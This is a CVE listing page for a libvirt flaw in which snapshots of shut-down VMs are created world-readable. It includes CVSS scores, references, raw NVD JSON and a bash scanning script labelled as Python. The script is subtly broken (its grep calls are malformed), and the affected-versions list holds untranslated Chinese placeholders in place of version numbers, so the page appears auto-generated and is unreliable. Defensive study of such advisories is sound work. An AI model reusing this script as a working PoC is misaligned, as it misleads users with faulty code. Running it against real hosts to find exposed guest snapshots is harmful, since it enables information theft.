CVE-2025-13193

Description

A flaw was found in libvirt. External inactive snapshots for shut-down VMs are incorrectly created as world-readable, making it possible for unprivileged users to inspect the guest OS contents. This results in an information disclosure vulnerability.

CVSS Details

CVSS Score

5.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

libvirt < 修复版本

Red Hat Enterprise Linux 8

Red Hat Enterprise Linux 9

Fedora (受影响的版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-13193 PoC - libvirt Information Disclosure
# This PoC demonstrates the information disclosure vulnerability in libvirt

# Check if user has access to libvirt
if ! groups | grep -q libvirt; then
    echo "[-] User not in libvirt group"
    exit 1
fi

# List all domains (VMs)
echo "[+] Listing available VMs..."
virsh list --all

# Find VMs in shut-off state
echo "[+] Checking for shut-off VMs..."
SHUTOFF_VMS=$(virsh list --all | grep shut off | awk '{print $2}')

# Attempt to access snapshot files for shut-off VMs
for vm in $SHUTOFF_VMS; do
    echo "[+] Checking VM: $vm"
    
    # List snapshots for the VM
    echo "[+] Listing snapshots for $vm..."
    virsh snapshot-list $vm 2>/dev/null
    
    # Get snapshot XML to find snapshot file location
    SNAPSHOTS=$(virsh snapshot-list $vm --roots 2>/dev/null | tail -n +3 | head -n -1 | awk '{print $1}')
    
    for snap in $SNAPSHOTS; do
        echo "[+] Checking snapshot: $snap"
        SNAP_FILE=$(virsh snapshot-dumpxml $vm $snap | grep -oP '(?<=<source file>)[^<]+')
        
        if [ -n "$SNAP_FILE" ]; then
            echo "[+] Snapshot file: $SNAP_FILE"
            
            # Try to read the snapshot file (this should fail but succeeds due to vuln)
            if [ -r "$SNAP_FILE" ]; then
                echo "[!] VULNERABLE: Snapshot file is world-readable!"
                echo "[+] File size: $(stat -c%s "$SNAP_FILE") bytes"
                echo "[+] File permissions: $(stat -c%a "$SNAP_FILE")"
            fi
        fi
    done
done

echo "[+] Scan complete"

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-13193
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-13193
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-13193/
[4] VulDB https://vuldb.com/cve/CVE-2025-13193
[5] https://access.redhat.com/security/cve/CVE-2025-13193
[6] https://bugzilla.redhat.com/show_bug.cgi?id=2415409

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-13193", "sourceIdentifier": "[email protected]", "published": "2025-11-17T17:15:47.110", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw was found in libvirt. External inactive snapshots for shut-down VMs are incorrectly created as world-readable, making it possible for unprivileged users to inspect the guest OS contents. This results in an information disclosure vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-276"}]}], "references": [{"url": "https://access.redhat.com/security/cve/CVE-2025-13193", "source": "[email protected]"}, {"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2415409", "source": "[email protected]"}]}}